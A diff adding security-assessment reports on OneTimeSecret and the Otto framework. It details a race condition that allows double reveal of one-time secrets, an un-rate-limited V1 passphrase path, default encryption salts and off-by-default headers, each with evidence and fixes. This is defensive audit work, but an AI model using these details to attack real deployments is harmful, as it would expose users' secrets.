+| F4 | Passphrase rate-limit check/record is non-atomic + capped Argon2 memory cost | LOW/MEDIUM | CONFIRMED |
+| F5 | No application-level cap on secret payload size (storage/DoS) | LOW | CONFIRMED |
+| F6 | Legacy v1 encryption key = unsalted single SHA-256 of `site.secret` | LOW (informational) | CONFIRMED |
+
+**Positives (verified safe):** Token generation uses 256-bit CSPRNG entropy; encryption is
+AEAD (AES-256-GCM / XChaCha20-Poly1305) with per-message random nonces and HKDF/BLAKE2b key
+derivation; passphrases use Argon2id with timing-safe verification; all Lua scripts use
+parameterized `KEYS`/`ARGV` binding (no injection); identifiers are sanitized with a strict
+allowlist before becoming Redis keys. Details in the "Areas reviewed and found sound" section.
+
+---
+
+## F1 — TOCTOU race in reveal/burn defeats the one-time guarantee (HIGH)
+
+**The crown-jewel guarantee.** A "one-time secret" must be revealable exactly once. The
+reveal/burn flow performs a **non-atomic check-then-act**: it reads the in-memory state, and
+only later destroys the record, with no lock, `WATCH`, conditional Lua, or atomic `GETDEL`
+binding the two together.
+
+### Evidence
+
+State guard + destroy (not atomic):
+`/home/user/onetimesecret/lib/onetime/models/secret/features/secret_state_management.rb:60-78`
+```ruby
+def revealed!
+  return unless state?(:new) || state?(:previewed)   # reads in-memory @state (loaded at request start)
+  md = load_receipt
+  md.revealed! unless md.nil?
+  @state      = 'revealed'
+  @ciphertext = nil
+  destroy!                                            # MULTI/EXEC delete, but NOT conditioned on state
+end
+```
+
+`destroy!` runs a Redis transaction (MULTI/EXEC) that deletes unconditionally — there is **no
+`WATCH` on the hash key and no server-side check that state is still `new`**:
+`/home/user/familia/lib/familia/horreum/persistence.rb:558-584` (transaction wraps `delete!`
+plus related-field cleanup; nothing aborts if a concurrent client already revealed).
+
+The reveal logic decrypts **before** the destroy, into a local that is returned in the
+response regardless of who wins the destroy race:
+- V2 RevealSecret: `/home/user/onetimesecret/apps/api/v2/logic/secrets/reveal_secret.rb:95` (`@secret_value = secret.decrypted_secret_value(...)`) then `:189` `secret.revealed!`
+- V2 ShowSecret: `/home/user/onetimesecret/apps/api/v2/logic/secrets/show_secret.rb:74` then `:154` (`reveal_secret` → `secret.revealed!`)
+- V1 ShowSecret: `/home/user/onetimesecret/apps/api/v1/logic/secrets/show_secret.rb:39` then `:71`
+- Burn: `/home/user/onetimesecret/apps/api/v2/logic/secrets/burn_secret.rb:54-74` (`viewable?` check at `:55`, `secret.burned!` at `:74`)
+
+The `viewable?`/`receivable?` gate read in `raise_concerns`
+(`reveal_secret.rb:64`, `show_secret.rb:49`) is likewise a plain in-memory read of state
+loaded by `Onetime::Secret.load` at request start.
+
+### Why this is exploitable
+
+Two (or N) concurrent requests for the same secret identifier each:
+1. `Onetime::Secret.load` → both read `state = 'new'`, `viewable? == true`.
+2. Both pass `raise_concerns`.
+3. Both call `decrypted_secret_value` → both obtain the plaintext.
+4. Both call `revealed!` → both pass `return unless state?(:new)` (in-memory, both still `'new'`)
+   → both call `destroy!` (the second delete is a harmless no-op).
+
+Result: **the same secret is revealed to two parties**, breaking the core product promise.
+The same applies to reveal-vs-burn races (one client reads the plaintext while another burns).
+
+### Contrast — the project already has the right primitives but doesn't use them here
+
+Familia ships a SETNX-based distributed lock and a WATCH+MULTI/EXEC create-if-absent, and the
+app uses them elsewhere, just not on the crown-jewel path:
+- `Familia::Lock#acquire` / `#release` (atomic Lua delete): `/home/user/familia/lib/familia/data_type/types/lock.rb:16-30`
+- `save_if_not_exists!` (WATCH+MULTI/EXEC): `/home/user/familia/lib/familia/horreum/persistence.rb:200-256`
+- Used in: `/home/user/onetimesecret/apps/api/organizations/logic/organizations/create_organization.rb:79-84`,
+  `/home/user/onetimesecret/apps/api/domains/logic/sender_config/validate_sender_config.rb:79-80`,
+  `/home/user/onetimesecret/lib/onetime/operations/provision_sender_domain.rb:82`.
+
+The reveal/burn path uses none of these.
+
+### Impact
+Confidentiality breach of the one-time guarantee: a secret can be disclosed to more than one
+party, or read after/while being burned. For a product whose entire value proposition is
+single-use disclosure, this is high impact.
+
+### Remediation
+Make the consume step atomic and authoritative on the server:
+- Preferred: a single atomic claim. e.g. a Lua script (or `HGET`+conditional `DEL`/`GETDEL` in
+  one server round-trip) that reads `state`, and only if it is `new`/`previewed` deletes the
+  key and returns the ciphertext; otherwise returns "already consumed". Decrypt only if the
+  claim succeeded. This collapses check-decrypt-destroy into one winner.
+- Alternative: `WATCH` the secret key, re-read `state`, and do the state-set + delete inside
+  `MULTI/EXEC`; retry/deny on abort. (`save`/`save_fields` already use `transaction`, so the
+  machinery exists — it just needs `WATCH` + a state precondition.)
+- Or wrap reveal/burn in `Familia::Lock` keyed on the secret identifier.
+
+**Status:** Race window CONFIRMED in source. A live two-request PoC to demonstrate a real
+double-reveal is NEEDS-VALIDATION (timing-dependent; widened by passphrase verification cost
+and the decrypt happening before destroy).
+
+---
+
+## F2 — Encryption salt/personalization left at shared library default (MEDIUM)
+
+The encrypted-field master key is correctly derived per-deployment from `site.secret` via
+HKDF. However, the *second* domain-separation input used inside each provider's own key
+derivation (HKDF salt for AES-GCM; BLAKE2b personalization for XChaCha20) is **never set by
+the application**, so it falls back to Familia's hardcoded global literal `'FamilialMatters'`.
+
+### Evidence
+- App configures only `encryption_keys` and `current_key_version`; it never sets
+  `encryption_hkdf_salt` or `encryption_personalization`:
+  `/home/user/onetimesecret/lib/onetime/initializers/configure_familia.rb:57-72`.
+  (Confirmed: no non-spec assignment of either setting exists anywhere in `lib/`, `etc/`, or `apps/`.)
+- Familia defaults both to the same non-empty literal:
+  `/home/user/familia/lib/familia/settings.rb:15-16`
+  ```ruby
+  @encryption_personalization = 'FamilialMatters'.freeze
+  @encryption_hkdf_salt       = 'FamilialMatters'.freeze
+  ```
+- Because the default is **non-empty**, the providers' "fail-closed" guards do NOT trip — the
+  weak global salt is used silently:
+  - AES-GCM `current_hkdf_salt` only raises on nil/empty: `/home/user/familia/lib/familia/encryption/providers/aes_gcm_provider.rb:113-121`.
+  - XChaCha20 `derive_key` only raises on nil/empty: `/home/user/familia/lib/familia/encryption/providers/xchacha20_poly1305_provider.rb:90-101`.
+- Familia's own docs flag this exact gap: the default "separates Familia's keys from other
+  HKDF users, but NOT one deployment from another"
+  (`/home/user/familia/lib/familia/settings.rb:114-117`). The provider comments reference
+  issues #310/#311 about removing the global static salt.
+
+### Impact
+Reduced HKDF extraction strength / cross-deployment domain separation. Severity is bounded
+because the per-field master key is already deployment-unique (derived from `site.secret`,
+`/home/user/onetimesecret/lib/onetime/key_derivation.rb:38,66`) and each ciphertext still uses
+a fresh random nonce under AEAD, so this is a defense-in-depth weakening, not a direct key
+recovery. It does mean all OneTimeSecret installations share the same salt/personalization
+constant, removing the per-deployment separation the library intends.
+
+### Remediation
+In `configure_familia.rb`, set both to deployment-unique values derived from `site.secret`
+(e.g. `Familia.config.encryption_hkdf_salt = KeyDerivation.derive_hex(secret_key, ...)` and a
+≤16-byte personalization), and register prior values in `encryption_hkdf_salt_history` so
+existing ciphertext keeps decrypting. **Status: CONFIRMED.**
+
+---
+
+## F3 — V1 reveal path has no passphrase rate limiting (MEDIUM)
+
+The passphrase brute-force protection (`PassphraseRateLimiter`,
+`/home/user/onetimesecret/lib/onetime/security/passphrase_rate_limiter.rb`, 5 attempts /
+10 min → 30 min lockout) is wired only into the **V2** logic
+(`reveal_secret.rb:35,68,194`, `show_secret.rb:20,53,69`).
+
+The **V1** `ShowSecret` neither includes the module nor calls the limiter:
+`/home/user/onetimesecret/apps/api/v1/logic/secrets/show_secret.rb:26-31` —
+`raise_concerns` only checks `viewable?`, and `process` calls `secret.passphrase?(passphrase)`
+with no attempt counting or lockout.
+
+### Impact
+If the V1 API remains routable, an attacker can brute-force a passphrase-protected secret's
+passphrase without lockout (Argon2id cost slows but does not stop offline-style online
+guessing; weak passphrases fall quickly). This also undermines the V2 lockout for the same
+secret, since V1 attempts are not counted.
+
+### Remediation
+Either retire/disable the V1 secrets endpoints, or include
+`Onetime::Security::PassphraseRateLimiter` and call `check_passphrase_rate_limit!` /
+`record_failed_passphrase_attempt!` in V1 `ShowSecret` exactly as V2 does. **Status: CONFIRMED.**
+
+---
+
+## F4 — Rate-limiter check/record gap + capped Argon2 memory cost (LOW/MEDIUM)
+
+Two sub-issues in the otherwise-good passphrase defenses:
+
+1. **Non-atomic check-then-record.** `check_passphrase_rate_limit!` reads the lockout/attempt
+   state, and the failed attempt is recorded separately afterward
+   (`reveal_secret.rb:68` then `:194`). The increment+expire+lockout *itself* is atomic Lua
+   (`passphrase_rate_limiter.rb:37-56`, `:106-110`) — good — but because the *gate* read and
+   the *record* are distinct round-trips with the model load in between, a burst of concurrent
+   guesses can all pass the gate before any failure is recorded, yielding more than
+   `MAX_ATTEMPTS` (5) live guesses per window. Bounded over-shoot, not an unlimited bypass.
+   Evidence: `passphrase_rate_limiter.rb:64-92` (read-only check) vs `:99-117` (record).
+
+2. **Argon2 memory cost is low.** Production cost is `{ t_cost: 2, m_cost: 16, p_cost: 1 }`
+   (`/home/user/onetimesecret/lib/onetime/models/features/passphrase_hashing.rb:68-74`).
+   `m_cost: 16` is the log2 exponent → 2^16 KiB = **64 MiB**, which is reasonable; `t_cost: 2`
+   is on the low side. The bigger note is the test cost `{ t_cost: 1, m_cost: 5, p_cost: 1 }`
+   (2^5 = 32 KiB) selected purely by `ENV['RACK_ENV'] == 'test'` — ensure production never runs
+   with `RACK_ENV=test`.
+
+### Impact
+Slightly-elevated online brute-force throughput against passphrases under concurrency; weak
+hashing if the test branch is ever active in production.
+
+### Remediation
+Record the attempt (or perform an atomic "consume one token") *before* verifying, or move the
+limit decision into the same Lua/transaction as the verification gate. Consider raising
+`t_cost`. Add a boot guard that refuses to start with `RACK_ENV=test` in production.
+**Status: CONFIRMED.**
+
+---
+
+## F5 — No application-level cap on secret payload size (LOW, DoS)
+
+`ConcealSecret`/`BaseSecretAction` validate TTL, passphrase length, recipient, and domain, but
+never bound the size of the secret value itself:
+`/home/user/onetimesecret/apps/api/v2/logic/secrets/conceal_secret.rb:21-31` (only rejects
+*empty* values); `/home/user/onetimesecret/apps/api/v2/logic/secrets/base_secret_action.rb`
+has no value-size check (confirmed: only `passphrase` length and `memo`/`MEMO_MAX_LENGTH` are
+bounded). The plaintext is encrypted and stored as a Redis hash field with a TTL.
+
+### Impact
+A client can store very large secrets, inflating Redis memory. Mitigated by the per-secret TTL
+(secrets expire) and any upstream web-server/Rack body limit (none found in-repo — relies on
+the deployment's proxy). Without an app-level cap, memory pressure / cost amplification is
+possible, especially for anonymous creation.
+
+### Remediation
+Enforce a maximum byte size on the secret value (and ideally tie it to plan limits) in
+`BaseSecretAction`/`ConcealSecret`, returning a form error above the limit. **Status: CONFIRMED.**
+
+---
+
+## F6 — Legacy v1 encryption key is unsalted SHA-256 of `site.secret` (LOW, informational)
+
+`/home/user/onetimesecret/lib/onetime/initializers/configure_familia.rb:65`
+```ruby
+v1_key = Base64.strict_encode64(Digest::SHA256.digest(secret_key))
+```
+The v1 key version is a single, unsalted SHA-256 of `site.secret`. `current_key_version` is
+`:v2` (HKDF-derived), so **new writes use v2**; v1 exists only to decrypt legacy data. This is
+acceptable as a read-only migration key, but a plain hash of the root secret is weaker than the
+v2 HKDF derivation and should be retired once all v1 ciphertext is re-encrypted/expired.
+
+### Remediation
+Plan removal of the v1 key after the v1→v2 data window (the model already carries
+`with_migration_fields`/`*_migration_fields` for this). **Status: CONFIRMED.**
+
+---
+
+## Areas reviewed and found sound (with evidence)
+
+### Token / secret identifier generation — STRONG
+- `Onetime::Secret`/`Onetime::Receipt` identifiers use
+  `Familia::VerifiableIdentifier.generate_verifiable_id`
+  (`/home/user/onetimesecret/lib/onetime/models/secret.rb:15-16`,
+  `/home/user/onetimesecret/lib/onetime/models/receipt.rb:13-14`).
+- That method's random component is `generate_id(16)` →
+  `_generate_secure_id(bits: 256, base: 16)` → `SecureRandom.hex(32)` = **256 bits of CSPRNG
+  entropy** (`/home/user/familia/lib/familia/verifiable_identifier.rb:91`,
+  `/home/user/familia/lib/familia/secure_identifier.rb:35-37,148-150`). Not guessable/enumerable.
+- The appended 64-bit HMAC-SHA256 tag is for stateless authenticity/forgery resistance
+  (keyed by `VERIFIABLE_ID_HMAC_SECRET`), verified with `OpenSSL.secure_compare`
+  (`verifiable_identifier.rb:108-128,161-185`). The HMAC secret has **no committed default** —
+  it raises if unset (`:45-54`), preventing forged identifiers.
+- `Familia.generate_id` (Secret/Receipt `generate_id` class method,
+  `secret_state_management.rb:17`) defaults to 256-bit base-36 as well.
+
+### Encryption at rest — STRONG
+- AEAD providers: AES-256-GCM (`aes_gcm_provider.rb:29-31`) and XChaCha20-Poly1305
+  (`xchacha20_poly1305_provider.rb:36-38`), selected by priority
+  (`Registry.default_provider`).
+- **Per-message random nonce from a CSPRNG** every encrypt:
+  `OpenSSL::Random.random_bytes(12)` (`aes_gcm_provider.rb:71-73`) and
+  `RbNaCl::Random.random_bytes(24)` (`xchacha20_poly1305_provider.rb:75-77`). No nonce reuse:
+  a fresh nonce is generated on every `encrypt` call (`manager.rb:17-23`) — no static/counter IV.
+- Per-record key derivation via HKDF-SHA256 (AES) / BLAKE2b-keyed (XChaCha20), keyed by a
+  per-field context `Class:field:identifier` (`encrypted_field_type.rb:183-185`,
+  `manager.rb:130-167`).
+- AAD binds ciphertext to record context (`encrypted_field_type.rb:206-220`); v2 envelopes are
+  self-describing so adding AAD fields later doesn't break old data (`:144-160`).
+- Cross-context misuse is detected on read (`belongs_to_context?`,
+  `encrypted_field_type.rb:88-94`).
+- Key rotation supported (`key_version`, salt-history decrypt loop `manager.rb:71-87`).
+- Caveat: see F2 (salt/personalization left at default).
+
+### Passphrase hashing — STRONG (see F3/F4 caveats)
+- Argon2id for new hashes; bcrypt only for legacy verification
+  (`passphrase_hashing.rb:33-34,48-62`). Verification uses the libraries' constant-time
+  comparators (`Argon2::Password.verify_password`, `BCrypt::Password#==`).
+
+### Lua / command injection — SAFE
+- All `eval`/`evalsha` calls pass user data via bound `keys:`/`argv:`, never string
+  interpolation: rate limiter (`passphrase_rate_limiter.rb:106-110`), `Counter#incr_if_lt`
+  (`/home/user/familia/lib/familia/data_type/types/counter.rb:25`), `Lock#release`
+  (`/home/user/familia/lib/familia/data_type/types/lock.rb:28-29`), migration scripts
+  (`/home/user/familia/lib/familia/migration/script.rb:140`). Script bodies are static literals.
+
+### Randomness audit — SAFE
+- Every security-sensitive random value uses a CSPRNG: `SecureRandom.*`,
+  `OpenSSL::Random.random_bytes`, `RbNaCl::Random.random_bytes`. No `Kernel#rand`, `Random.new`,
+  `Random.rand`, or `srand` in security contexts across `/home/user/onetimesecret/lib` or
+  `/home/user/familia/lib`.
+- The deterministic external-identifier derivation deliberately avoids Mersenne-Twister and
+  uses SHA-256/HMAC instead, with an explicit comment about the removed MT weakness
+  (`/home/user/familia/lib/familia/features/external_identifier.rb:308-333`).
+
+### Redis key naming / enumeration — LOW RISK
+- Keys are prefixed (`prefix :secret`, `prefix :receipt`) and keyed by the 256-bit
+  unguessable identifier, so direct enumeration via guessing is infeasible.
+- The identifier sanitizer enforces a strict allowlist `[^a-zA-Z0-9_-]` before any value is
+  used as/within a key, preventing Redis key/glob injection (no `:`, `*`, `?`, whitespace, or
+  newlines survive): `/home/user/onetimesecret/lib/onetime/security/input_sanitizers.rb:34,53-55`.
+- Note (operational, not a code bug): the rate-limiter keys embed the raw secret identifier
+  (`passphrase:attempts:{id}`, `passphrase:locked:{id}`,
+  `passphrase_rate_limiter.rb:134-139`); anyone with Redis `KEYS`/`SCAN` access could enumerate
+  which secrets are under attack. Restrict direct Redis access in production.
+
+---
+
+## Suggested remediation priority
+1. **F1** — make reveal/burn atomic (single-winner consume). Highest priority; it is the
+   product's core guarantee.
+2. **F3** — rate-limit (or retire) the V1 reveal path.
+3. **F2** — set per-deployment `encryption_hkdf_salt` / `encryption_personalization`.
+4. **F4 / F5 / F6** — harden rate-limit ordering, cap payload size, retire the v1 key.

--- a/docs/security/assessment-2026-06-22/findings/04-api-otto.md
+++ b/docs/security/assessment-2026-06-22/findings/04-api-otto.md
@@ -1,0 +1,196 @@
+# Security Assessment — REST API + Otto Web Framework
+
+**Scope:** REST API security of OneTimeSecret (`/home/user/onetimesecret`) and the Otto web framework (`/home/user/otto`, v2.3.1).
+**Mode:** READ-ONLY source review. Synthetic/local only. Owner-authorized.
+**Date:** 2026-06-22
+**Branch:** claude/vigilant-goldberg-97ijfl
+
+Evidence is cited as `file:line`. Each finding is tagged **CONFIRMED** (verified in code) or **NEEDS-VALIDATION** (suspected; depends on deploy config or unread code). Severity reflects realistic impact for a default-ish deployment.
+
+---
+
+## Executive summary
+
+The **Otto framework itself is in good shape**. The client-IP / trusted-proxy / X-Forwarded-For logic (the harmonization target) is carefully designed: a single canonical resolver (`Otto::Utils.resolve_client_ip`), CIDR-walk and count-based depth modes, IPv4/IPv6-aware, forwarded headers honored **only** behind a trusted proxy, and a leak-free `env['otto.via_trusted_proxy']` recorded before masking. Dynamic dispatch (`send` to route handlers) is driven by the trusted routes file, not user input, and is guarded by `ConstantResolver` (allowlist regex + forbidden-class blocklist). Static file serving has path-traversal protection. Error handling is generic in production with correlation IDs. No CORS is shipped (safe default).
+
+The **highest-impact issues are in the OneTimeSecret integration layer**, not Otto:
+
+| # | Finding | Severity |
+|---|---|---|
+| 1 | Security headers (HSTS, X-Frame-Options, CSP, Origin-CSRF) are **off by default**; CSP/nosniff absent entirely from the rack-protection stack | High |
+| 2 | Cookie-authenticated `/api/*` state-changing endpoints are **exempt from token CSRF**; only fallback is `HttpOrigin`, which is **off by default** | High |
+| 3 | `Rack::DetectHost` trusts forwarded **Host** headers from any RFC1918/loopback peer — an **un-harmonized** second trusted-proxy model; host-header injection from an internal/SSRF vantage | Medium |
+| 4 | No app-layer rate limiting on **auth/login** and on **V2/V3 secret creation**; V1 limiter is fail-open + exempts authenticated users | Medium |
+| 5 | V1 Basic Auth is **timing-distinguishable** for username enumeration (no dummy-hash mitigation, unlike V2/V3) | Low/Medium |
+| 6 | No explicit request-body size / JSON depth limits in OTS app/middleware (Otto's own limits are not in OTS's path for parsed bodies) | Low/Medium |
+| 7 | Multiple independent client-IP trust readers (otto, DetectHost, HealthAccessControl, rack-protection IPSpoofing) — drift risk | Low |
+| 8 | V1 logs attacker-controlled `custid` (Basic Auth username) without newline sanitization (log injection, debug-level) | Low |
+
+---
+
+## 1. Otto framework
+
+### 1.1 Client IP / X-Forwarded-For / trusted-proxy (CONFIRMED — strong)
+
+The harmonization (commit "Harmonize IP / trusted-proxy handling via otto 2.3.1") is well-built.
+
+- Single canonical resolver: `Otto::Utils.resolve_client_ip` (`/home/user/otto/lib/otto/utils.rb:112-140`). Forwarded headers (`X-Forwarded-For`, `X-Real-IP`, `X-Client-IP` — `utils.rb:15-19`) are honored **only** when `REMOTE_ADDR` is a trusted proxy (`utils.rb:124`). It walks the chain left-to-right and returns the first hop that is not itself a trusted proxy (`utils.rb:130-139`). With no config, `REMOTE_ADDR` is returned unchanged — forwarded headers from untrusted peers are ignored. This is the correct anti-spoofing model.
+- Count-based depth mode ("trust last N hops", Express `trust proxy = N`): `resolve_client_ip_by_depth` (`utils.rb:172-187`) counts positions from the right and is robust to forwarded-header padding (a forged leftmost entry is never reached). RFC 7239 `Forwarded` parsing correctly handles quoted strings / IPv6 brackets and refuses to truncate at a `;` inside DQUOTEs (`utils.rb:235-262`). The two modes are mutually exclusive and validated at config time and at freeze (`config.rb:149-166,227-234,531-537`).
+- `trusted_proxy?` uses real `IPAddr` CIDR containment, IPv4-mapped-IPv6 folding (`config.rb:181-201`), parsed once at registration (`config.rb:558-564`).
+- `IPPrivacyMiddleware` resolves once into `env['otto.client_ip']`, is idempotent (`ip_privacy_middleware.rb:49`), records `env['otto.via_trusted_proxy']` from the **original peer before masking** (`ip_privacy_middleware.rb:59`), then masks `REMOTE_ADDR` and the forwarded headers (`ip_privacy_middleware.rb:119-135,164-172`). `Request#secure?` authorizes `X-Forwarded-Proto`/`X-Scheme` only via this leak-free flag (`request.rb:180-209`).
+
+**Residual notes (NEEDS-VALIDATION, deployment-dependent):**
+- Depth mode "ASSUMES ORIGIN LOCKDOWN" — the app must be unreachable except through the proxy tier, or a direct client can pad the forwarded header (documented at `utils.rb:152-156`). This is an inherent property of count-based trust, not a bug; verify the deployment firewalls direct access when `trusted_proxy.mode: depth`.
+- OTS's filter mode trusts the broad `PRIVATE_PROXY_RANGES` regex (all RFC1918/loopback/link-local) as proxies by default (`/home/user/onetimesecret/lib/onetime/application/middleware_stack.rb:72-83,237`). For a chain like `X-Forwarded-For: <attacker-spoofed-public>, <real proxy private>`, the resolver returns the spoofed public value if the real proxy hop is private and the spoofed value is the first non-private entry. This is the standard filter-mode trade-off; it only matters if an attacker can inject XFF and reach a trusted proxy — generally not directly exploitable behind a header-stripping ingress, but worth confirming the ingress overwrites (not appends) XFF.
+
+### 1.2 Routing / dispatch / dynamic `send` (CONFIRMED — safe)
+
+- Routes are loaded from a trusted plaintext file (`core/router.rb:11-64`); the class/method strings come from that file, never from request data.
+- Dispatch uses `send(method_name, req, res)` (`route_handlers/class_method.rb:26`, `route.rb:146-153`) where `method_name` is parsed from the route definition at load (`route_definition.rb:192-209`).
+- Class resolution goes through `Otto::Security::ConstantResolver.safe_const_get` (`security/constant_resolver.rb:46-70`): allowlist regex `\A[A-Z][a-zA-Z0-9_]*(?:::...)*\z`, a `FORBIDDEN_CLASSES` blocklist (Kernel, File, Dir, Process, etc.), AND an identity check against resolved `FORBIDDEN_CONSTANTS` to catch namespace-prefix / trailing-segment inheritance bypasses (`constant_resolver.rb:62-67`). Strong.
+- URL route params are merged into `req.params` (`route.rb:117-118`) but never used to select the method — no parameter-driven dispatch.
+
+### 1.3 Static file serving / path traversal (CONFIRMED — safe)
+
+`FileSafety#safe_file?` (`core/file_safety.rb:9-32`): strips null bytes, `File.expand_path`-normalizes, and **requires the resolved path to start with `public_dir + File::SEPARATOR`** (`file_safety.rb:25`) — blocks `../` traversal. Also requires the file be owned/group-owned and not a directory. `handle_request` unescapes `PATH_INFO` and replaces invalid UTF-8 before matching (`core/router.rb:71-89`).
+
+### 1.4 Security headers in Otto (CONFIRMED)
+
+Otto applies conservative defaults: `x-content-type-options: nosniff`, `x-xss-protection`, `referrer-policy` (`security/config.rb:630-636`). HSTS/CSP/X-Frame-Options are **off by default by design** and must be enabled explicitly (`otto.rb:46-51`, `config.rb:324-411`). CSP supports static or per-request nonce policies (`config.rb:343-400`, `response.rb:123-150`). Note: OTS does **not** enable these otto features (see §4) and routes its own rack-protection stack instead.
+
+### 1.5 CSRF in Otto (CONFIRMED — not used by OTS)
+
+Otto ships a complete HMAC-SHA256, session-bound, constant-time CSRF implementation (`security/config.rb:286-312`, `security/middleware/csrf_middleware.rb`) that refuses a generated per-process secret in production (`config.rb:683-699`). **OTS does not use it** — it uses `Rack::Protection::AuthenticityToken` instead (see §6). Informational.
+
+### 1.6 CORS in Otto (CONFIRMED — none)
+
+No `Access-Control-*` handling anywhere in `/home/user/otto/lib`. Safe by default (no reflected origin, no wildcard+credentials). CORS would be entirely the host app's responsibility.
+
+### 1.7 Otto input-validation middleware (CONFIRMED — present but NOT in OTS's path)
+
+`ValidationMiddleware` (`security/middleware/validation_middleware.rb`) enforces request-size (`max_request_size` 10 MB default), param depth (32) and key count (64) limits (`validation_middleware.rb:103-129`, `config.rb:77-79`), rejects null bytes / control chars in param names and dangerous headers, and runs a Loofah whitewash + script-injection blocklist on all string values (`validation_middleware.rb:158-183`, `helpers/validation.rb:85-95`).
+
+Two observations:
+- The script-injection blocklist (`/on\w+\s*=/i`, `/javascript:/i`, etc.) is a global denylist applied to **every** param value. For an app that stores arbitrary secret content this would be both bypassable and prone to false-positives — but it is moot here because **OTS does not mount this middleware** (OTS uses `Rack::Parser` + per-field `InputSanitizers`; see §2). Informational for otto.
+- Otto's own size/depth limits therefore do **not** protect OTS's parsed request bodies (see §7).
+
+---
+
+## 2. Input validation & sanitization (OTS) — CONFIRMED
+
+- `Onetime::Security::InputSanitizers` (`/home/user/onetimesecret/lib/onetime/security/input_sanitizers.rb`): allowlist `sanitize_identifier` (`:34,53-55`), multi-pass decode+`Sanitize.fragment` `sanitize_plain_text` (`:73-91`, defeats multiply-encoded payloads), CR/LF-stripping `sanitize_email` (`:40,104-106`, prevents email-header injection), allowlist `sanitize_ip_address` (`:44,116-118`). Solid, but **opt-in per logic class** — coverage depends on each `process_params` calling the right sanitizer.
+- Percent-encoding guard `Rack::HandleInvalidPercentEncoding` (`lib/middleware/handle_invalid_percent_encoding.rb`): triggers `request.params` parse and returns 400 on `invalid %-encoding` (`:46-75`). **Gate caveat:** `check_enabled?` inspects only `route_definitions.first` (`:82-91`) — if the first route's class lacks `check_uri_encoding`, the check is skipped for the whole app. Same pattern in `handle_invalid_utf8.rb:89-98`. NEEDS-VALIDATION: whether these are mounted at all (not found in the universal `MiddlewareStack`) and whether every app's first route enables the flag.
+- **JSON Schema (json_schemer): NOT used for request bodies.** Only used to validate config YAML at boot (`lib/onetime/operations/config/validate.rb`) and the billing catalog. Route `request=`/`response=` schema names are OpenAPI-doc metadata only. **API request bodies are not schema-validated** — they rely entirely on per-logic `process_params` + sanitizers. (CONFIRMED via repo-wide grep; only `*.rb` matches are config/billing, not request handling.)
+- Redis injection: all four limiters + error tracker use parameterized `redis.eval(..., keys:, argv:)` server-side Lua — no Ruby `eval`, no string-built commands. DNS limiter sanitizes the key (`dns_rate_limiter.rb:171-173`); invite limiter canonicalizes IP via `IPAddr` (`invite_token_rate_limiter.rb:201-211`). No Redis command injection found.
+
+---
+
+## 3. Rate limiting — CONFIRMED (with coverage gaps)
+
+Four dedicated limiters, all atomic-Lua, well-implemented:
+
+| Limiter | File | Key | Limit / window | Notes |
+|---|---|---|---|---|
+| Passphrase | `lib/onetime/security/passphrase_rate_limiter.rb` | `passphrase:{attempts,locked}:{secret_id}` (`:134-139`) | 5 / 600s, 1800s lockout (`:28-34`) | **per-secret** (not IP) — cannot be IP-spoofed; minor lockout-DoS of a victim secret |
+| Feedback | `feedback_rate_limiter.rb` | `feedback:{submissions,locked}:{ip}` (`:135-141`) | 10 / 1200s (`:28-34`) | IP-keyed |
+| Invite token | `invite_token_rate_limiter.rb` | `invite_{attempts,locked}:{ip}` (`:191-197`) | 100 / 600s, 1200s lockout (`:32-38`) | IP canonicalized |
+| DNS | `dns_rate_limiter.rb` | `dns:ratelimit:{domain_id}` (`:171-173`) | 100 / 3600s (`:34-37`) | per-domain |
+
+**Coverage gaps (Medium):**
+- **Auth/login: no app-layer rate limiting.** No limiter around session authentication or registration/reset (confirmed via subagent survey of `apps/web/core/controllers/authentication.rb`, `registration.rb`; no `RateLimit`/`throttle` in `lib/` beyond the four limiters + V1). Rodauth/advanced-auth mode may add its own — NEEDS-VALIDATION.
+- **V2/V3 secret creation (`conceal`/`generate`): no app-layer rate limiting.** Only passphrase brute-force on retrieval is limited (V2 wires the passphrase limiter; `apps/api/v2/logic/secrets/show_secret.rb`, `reveal_secret.rb`). Anonymous `POST /api/v3/guest/secret/conceal` and `/api/v2/secret/conceal` are unthrottled in-app.
+- **V1** has a general per-IP limiter (`apps/api/v1/controllers/base.rb:145-171`, key `v1:ratelimit:{event}:{ip}`, 1000/20 min for both create and read) but it **fails open if Redis errors** (`:165-168`) and **fully exempts authenticated paid users** (`:147`). The code itself calls this "vestigial — rate limits now enforced externally (infrastructure layer)" (`:124-126`).
+
+**Key-derivation / bypass:** IP-keyed limiters use `env['otto.client_ip']` (the masked IP). Because OTS masks public IPs (typically /24 for IPv4), an entire /24 can share one bucket — accidental aggregation, but the limits are generous so practical impact is low. Spoofing requires the trusted-proxy preconditions in §1.1. The IP masking is applied uniformly, so this does not create an attacker-controlled key-rotation bypass unless XFF spoofing is possible.
+
+---
+
+## 4. Security headers / CSP (OTS) — CONFIRMED — High
+
+OTS configures security via `Rack::Protection` in `lib/onetime/middleware/security.rb`, but **each component is opt-in via config** (`security.rb:73-82`: `next unless middleware_settings[middleware_key]`). The defaults in `etc/defaults/config.defaults.yaml:299-353` are:
+
+| Protection | Default | Effect when off |
+|---|---|---|
+| `utf8_sanitizer` | **ON** (`!= 'false'`) | — |
+| `authenticity_token` (token CSRF) | **ON** (`!= 'false'`) | — (but see §6 `/api/` bypass) |
+| `http_origin` (Origin-CSRF) | **OFF** (`== 'true'`) | no Origin/Referer CSRF check |
+| `xss_header` | **OFF** | no `X-XSS-Protection` |
+| `frame_options` | **OFF** | **clickjacking possible** (no `X-Frame-Options`) |
+| `path_traversal` | **OFF** | relies on otto's `safe_file?` only |
+| `cookie_tossing` | **OFF** | subdomain cookie fixation |
+| `ip_spoofing` | **OFF** | — |
+| `strict_transport` (HSTS) | **OFF** | **no HSTS** — TLS-stripping / cookie over HTTP |
+| `security.csp.enabled` | **OFF** (`config.defaults.yaml:352-353`) | **no Content-Security-Policy** |
+
+Additional gaps:
+- **No CSP middleware exists at all** in the rack-protection component list (`security.rb:96-202`) — even when `csp.enabled` is set, that flag drives view-layer nonce injection, not a `Content-Security-Policy` response header from this stack. NEEDS-VALIDATION of the actual CSP header path.
+- **No `X-Content-Type-Options: nosniff`** in OTS's rack-protection list. (Otto's per-route handler does set `x-content-type-options: nosniff` via `security/config.rb:632` for routes that flow through Otto's `Route#call`, so API JSON responses likely get it — but the OTS web/SPA path and error responses may not. NEEDS-VALIDATION.)
+
